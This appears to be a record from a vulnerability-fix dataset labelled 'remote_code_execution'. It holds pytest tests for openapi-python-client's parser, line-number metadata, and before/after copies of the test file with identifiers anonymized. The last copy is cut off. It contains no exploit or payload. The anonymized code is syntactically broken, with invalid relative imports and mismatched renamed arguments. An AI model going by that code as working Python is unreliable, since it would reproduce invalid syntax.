def test__add_parameters_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
path_prop = mocker.MagicMock(autospec=Property)
path_prop_import = mocker.MagicMock()
path_prop.get_imports = mocker.MagicMock(return_value={path_prop_import})
query_prop = mocker.MagicMock(autospec=Property)
query_prop_import = mocker.MagicMock()
query_prop.get_imports = mocker.MagicMock(return_value={query_prop_import})
header_prop = mocker.MagicMock(autospec=Property)
header_prop_import = mocker.MagicMock()
header_prop.get_imports = mocker.MagicMock(return_value={header_prop_import})
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[path_prop, query_prop, header_prop]
)
path_schema = mocker.MagicMock()
query_schema = mocker.MagicMock()
header_schema = mocker.MagicMock()
data = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=path_schema, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=query_schema, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=header_schema, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
endpoint = Endpoint._add_parameters(endpoint, data)
property_from_data.assert_has_calls(
[
mocker.call(name="path_prop_name", required=True, data=path_schema),
mocker.call(name="query_prop_name", required=False, data=query_schema),
mocker.call(name="header_prop_name", required=False, data=header_schema),
]
)
path_prop.get_imports.assert_called_once_with(prefix="..models")
query_prop.get_imports.assert_called_once_with(prefix="..models")
header_prop.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_3", path_prop_import, query_prop_import, header_prop_import}
assert endpoint.path_parameters == [path_prop]
assert endpoint.query_parameters == [query_prop]
assert endpoint.header_parameters == [header_prop]
def test_from_data_bad_params(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data_bad_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses")
_add_body = mocker.patch.object(Endpoint, "_add_body")
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=data.description)
endpoint = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert endpoint == _add_body.return_value
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=True,
tag="default",
),
data,
)
_add_responses.assert_called_once_with(_add_parameters.return_value, data.responses)
_add_body.assert_called_once_with(_add_responses.return_value, data)
data.security = None
_add_parameters.reset_mock()
Endpoint.from_data(data=data, path=path, method=method, tag="a")
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=False,
tag="a",
),
data,
)
data.operationId = None
assert Endpoint.from_data(data=data, path=path, method=method, tag="a") == ParseError(
data=data, detail="Path operations with operationId are not yet supported"
)
class TestImportStringFromReference:
def test_import_string_from_reference_no_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference)
assert result == f"from .{reference.module_name} import {reference.class_name}"
def test_import_string_from_reference_with_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
prefix = mocker.MagicMock(autospec=str)
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference=reference, prefix=prefix)
assert result == f"from {prefix}.{reference.module_name} import {reference.class_name}"
class TestEndpointCollection:
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_1 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
endpoint_2 = mocker.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
endpoint_3 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[endpoint_1, endpoint_2, endpoint_3]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result == {
"default": EndpointCollection(
"default", endpoints=[endpoint_1, endpoint_3], relative_imports={"1", "2", "3"}
),
"tag_2": EndpointCollection("tag_2", endpoints=[endpoint_2], relative_imports={"2"}),
}
def test_from_data_errors(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection, ParseError
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[ParseError(data="1"), ParseError(data="2"), ParseError(data="3")]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result["default"].parse_errors[0].data == "1"
assert result["default"].parse_errors[1].data == "3"
assert result["tag_2"].parse_errors[0].data == "2"
| remote_code_execution | {
"code": [
"from openapi_python_client import GeneratorError"
],
"line_no": [
5
]
} | {
"code": [
"from openapi_python_client import GeneratorError, utils",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=data.description)"
],
"line_no": [
5,
549
]
} | from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import .openapi_python_client.schema as oai
from openapi_python_client import GeneratorError
from openapi_python_client.parser.errors import ParseError
VAR_0 = "openapi_python_client.parser.openapi"
class CLASS_0:
def FUNC_0(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_3 = VAR_1.patch(f"{VAR_0}.EndpointCollection")
VAR_4 = VAR_1.patch(f"{VAR_0}.oai.OpenAPI")
VAR_5 = VAR_4.parse_obj.return_value
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch(f"{VAR_0}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_4.parse_obj.assert_called_once_with(VAR_6)
VAR_2.build.assert_called_once_with(schemas=VAR_5.components.schemas)
VAR_3.from_data.assert_called_once_with(VAR_39=VAR_5.paths)
VAR_7.assert_called_once_with()
assert VAR_8 == GeneratorData(
title=VAR_5.info.title,
description=VAR_5.info.description,
version=VAR_5.info.version,
endpoint_collections_by_tag=VAR_3.from_data.return_value,
schemas=VAR_2.build.return_value,
enums=VAR_7.return_value,
)
VAR_5.components = None
VAR_2.build.reset_mock()
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_2.build.assert_not_called()
assert VAR_8.schemas == VAR_2()
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_6 = {}
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
assert VAR_8 == GeneratorError(
header="Failed to parse VAR_4 document",
detail=(
"2 validation errors for VAR_4\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
VAR_2.build.assert_not_called()
VAR_2.assert_not_called()
class CLASS_1:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_10 = VAR_1.MagicMock(autospec=Property)
VAR_11 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_11}
VAR_12 = VAR_1.MagicMock(autospec=Property)
VAR_13 = VAR_1.MagicMock()
VAR_12.get_imports.return_value = {VAR_13}
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_10, VAR_12],
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_has_calls(
[
VAR_1.call(name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]),
VAR_1.call(name="OptionalDateTime", required=False, VAR_39=VAR_9.properties["OptionalDateTime"]),
]
)
VAR_10.get_imports.assert_called_once_with(VAR_62="")
VAR_12.get_imports.assert_called_once_with(VAR_62="")
assert VAR_16 == Model(
VAR_61=VAR_15(),
required_properties=[VAR_10],
optional_properties=[VAR_12],
relative_imports={VAR_11, VAR_13,},
description=VAR_9.description,
)
def FUNC_3(self, VAR_1):
VAR_9 = oai.Schema.construct(
title=VAR_1.MagicMock(),
description=VAR_1.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": VAR_1.MagicMock(), "OptionalDateTime": VAR_1.MagicMock(),},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17,)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
VAR_16 = Model.from_data(VAR_39=VAR_9, name=VAR_1.MagicMock())
VAR_15.assert_called_once_with(VAR_9.title)
VAR_14.assert_called_once_with(
name="RequiredEnum", required=True, VAR_39=VAR_9.properties["RequiredEnum"]
)
assert VAR_16 == VAR_17
class CLASS_2:
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_9 = {"1": VAR_1.MagicMock(enum=None), "2": VAR_1.MagicMock(enum=None), "3": VAR_1.MagicMock(enum=None)}
VAR_19 = VAR_1.MagicMock()
VAR_20 = VAR_1.MagicMock()
VAR_21 = ParseError()
VAR_18.side_effect = [VAR_19, VAR_20, VAR_21]
from openapi_python_client.parser.openapi import .Schemas
VAR_16 = VAR_2.build(schemas=VAR_9)
VAR_18.assert_has_calls([VAR_1.call(VAR_39=value, name=name) for (name, value) in VAR_9.items()])
assert VAR_16 == VAR_2(
models={VAR_19.reference.class_name: VAR_19, VAR_20.reference.class_name: VAR_20,}, errors=[VAR_21]
)
def FUNC_5(self):
from openapi_python_client.parser.openapi import .Schemas
VAR_22 = oai.Reference.construct()
VAR_9 = {1: VAR_22}
VAR_16 = VAR_2.build(schemas=VAR_9)
assert VAR_16.errors[0] == ParseError(VAR_39=VAR_22, detail="Reference schemas are not supported.")
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.openapi import .Schemas
VAR_18 = VAR_1.patch(f"{VAR_0}.Model.from_data")
VAR_23 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_9 = {"1": VAR_1.MagicMock(enum=["val1", "val2", "val3"])}
VAR_2.build(schemas=VAR_9)
VAR_23.assert_called()
VAR_18.assert_not_called()
class CLASS_3:
def FUNC_7(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(VAR_24=ref)
)
}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_8(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_form_body(VAR_25)
assert VAR_16 is None
def FUNC_9(self, VAR_1):
VAR_24 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(VAR_24=ref))}
)
VAR_15 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
VAR_15.assert_called_once_with(VAR_24)
assert VAR_16 == VAR_15()
def FUNC_10(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_multipart_body(VAR_25)
assert VAR_16 is None
def FUNC_11(self, VAR_1):
VAR_26 = VAR_1.MagicMock()
VAR_25 = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=VAR_26)}
)
VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
VAR_14.assert_called_once_with("json_body", required=True, VAR_39=VAR_26)
assert VAR_16 == VAR_14()
def FUNC_12(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
assert VAR_16 is None
def FUNC_13(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_27 = VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(VAR_28, oai.Operation.construct())
VAR_27.assert_not_called()
def FUNC_14(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_17)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_29 = VAR_1.MagicMock()
VAR_16 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
assert VAR_16 == ParseError(detail=f"cannot parse VAR_25 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data)
def FUNC_15(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
VAR_29 = VAR_1.MagicMock()
VAR_30 = Reference.from_ref(VAR_24="a")
VAR_31 = Reference.from_ref(VAR_24="b")
VAR_27 = VAR_1.patch.object(
Endpoint, "parse_request_form_body", return_value=VAR_30
)
VAR_32 = VAR_1.patch.object(
Endpoint, "parse_multipart_body", return_value=VAR_31
)
VAR_33 = VAR_1.MagicMock(autospec=Property)
VAR_34 = VAR_1.MagicMock()
VAR_33.get_imports.return_value = {VAR_34}
VAR_35 = VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_33)
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_28 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
VAR_27.assert_called_once_with(VAR_29)
VAR_35.assert_called_once_with(VAR_29)
VAR_32.assert_called_once_with(VAR_29)
VAR_36.assert_has_calls(
[
VAR_1.call(VAR_30, VAR_62="..models"),
VAR_1.call(VAR_31, VAR_62="..models"),
]
)
VAR_33.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3", VAR_34}
assert VAR_28.json_body == VAR_33
assert VAR_28.form_body_reference == VAR_30
assert VAR_28.multipart_body_reference == VAR_31
def FUNC_16(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", return_value=VAR_17)
VAR_41 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_called_once_with(status_code=200, VAR_39=VAR_37)
assert VAR_41 == ParseError(
detail=f"cannot parse VAR_41 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data
)
def FUNC_17(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_42 = Reference.from_ref(VAR_24="ref_1")
VAR_43 = Reference.from_ref(VAR_24="ref_2")
VAR_44 = RefResponse(status_code=200, VAR_61=VAR_42)
VAR_45 = RefResponse(status_code=404, VAR_61=VAR_43)
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", side_effect=[VAR_44, VAR_45])
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_has_calls(
[VAR_1.call(status_code=200, VAR_39=VAR_37), VAR_1.call(status_code=404, VAR_39=VAR_38),]
)
VAR_36.assert_has_calls(
[VAR_1.call(VAR_42, VAR_62="..models"), VAR_1.call(VAR_43, VAR_62="..models"),]
)
assert VAR_28.responses == [VAR_44, VAR_45]
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3"}
def FUNC_18(self):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
assert Endpoint._add_parameters(VAR_28, oai.Operation.construct()) == VAR_28
def FUNC_19(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17)
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_17.data, detail=f"cannot parse parameter of VAR_28 {endpoint.name}")
def FUNC_20(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_1.patch(f"{VAR_0}.property_from_data")
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_46, detail="Parameter must be declared in VAR_56 or query")
def FUNC_21(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_47 = VAR_1.MagicMock(autospec=Property)
VAR_48 = VAR_1.MagicMock()
VAR_47.get_imports = VAR_1.MagicMock(return_value={VAR_48})
VAR_49 = VAR_1.MagicMock(autospec=Property)
VAR_50 = VAR_1.MagicMock()
VAR_49.get_imports = VAR_1.MagicMock(return_value={VAR_50})
VAR_51 = VAR_1.MagicMock(autospec=Property)
VAR_52 = VAR_1.MagicMock()
VAR_51.get_imports = VAR_1.MagicMock(return_value={VAR_52})
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_47, VAR_49, VAR_51]
)
VAR_53 = VAR_1.MagicMock()
VAR_54 = VAR_1.MagicMock()
VAR_55 = VAR_1.MagicMock()
VAR_39 = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=VAR_53, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=VAR_54, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=VAR_55, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
VAR_28 = Endpoint._add_parameters(VAR_28, VAR_39)
VAR_14.assert_has_calls(
[
VAR_1.call(name="path_prop_name", required=True, VAR_39=VAR_53),
VAR_1.call(name="query_prop_name", required=False, VAR_39=VAR_54),
VAR_1.call(name="header_prop_name", required=False, VAR_39=VAR_55),
]
)
VAR_47.get_imports.assert_called_once_with(VAR_62="..models")
VAR_49.get_imports.assert_called_once_with(VAR_62="..models")
VAR_51.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_3", VAR_48, VAR_50, VAR_52}
assert VAR_28.path_parameters == [VAR_47]
assert VAR_28.query_parameters == [VAR_49]
assert VAR_28.header_parameters == [VAR_51]
def FUNC_22(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses")
VAR_60 = VAR_1.patch.object(Endpoint, "_add_body")
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_28 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_28 == VAR_60.return_value
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=True,
tag="default",
),
VAR_39,
)
VAR_59.assert_called_once_with(VAR_58.return_value, VAR_39.responses)
VAR_60.assert_called_once_with(VAR_59.return_value, VAR_39)
data.security = None
VAR_58.reset_mock()
Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a")
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=False,
tag="a",
),
VAR_39,
)
data.operationId = None
assert Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a") == ParseError(
VAR_39=data, detail="Path operations with operationId are not yet supported"
)
class CLASS_4:
def FUNC_24(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61)
assert VAR_16 == f"from .{VAR_61.module_name} import {VAR_61.class_name}"
def FUNC_25(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_62 = VAR_1.MagicMock(autospec=str)
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61=reference, VAR_62=prefix)
assert VAR_16 == f"from {VAR_62}.{VAR_61.module_name} import {VAR_61.class_name}"
class CLASS_5:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_66 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
VAR_67 = VAR_1.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
VAR_68 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[VAR_66, VAR_67, VAR_68]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16 == {
"default": VAR_3(
"default", endpoints=[VAR_66, VAR_68], relative_imports={"1", "2", "3"}
),
"tag_2": VAR_3("tag_2", endpoints=[VAR_67], relative_imports={"2"}),
}
def FUNC_26(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3, ParseError
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[ParseError(VAR_39="1"), ParseError(VAR_39="2"), ParseError(VAR_39="3")]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16["default"].parse_errors[0].data == "1"
assert VAR_16["default"].parse_errors[1].data == "3"
assert VAR_16["tag_2"].parse_errors[0].data == "2"
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import .openapi_python_client.schema as oai
from openapi_python_client import GeneratorError, utils
from openapi_python_client.parser.errors import ParseError
VAR_0 = "openapi_python_client.parser.openapi"
class CLASS_0:
def FUNC_0(self, VAR_1):
VAR_2 = VAR_1.patch(f"{VAR_0}.Schemas")
VAR_3 = VAR_1.patch(f"{VAR_0}.EndpointCollection")
VAR_4 = VAR_1.patch(f"{VAR_0}.oai.OpenAPI")
VAR_5 = VAR_4.parse_obj.return_value
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch(f"{VAR_0}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
VAR_8 = GeneratorData.from_dict(VAR_6)
VAR_4.parse_obj.assert_called_once_with(VAR_6)
VAR_2.build.assert_called_once_with(schemas=VAR_5.components.schemas)
VAR_3.from_data.assert_called_once_with(VAR_39=VAR_5.paths)
VAR_7.assert_called_once_with()
assert VAR_8 == GeneratorData(
title=VAR_5.info.title,
description=VAR_5.info.description,
version=VAR_5.info.version,
endpoint_collections_by_tag=VAR_3.from_data.return_value,
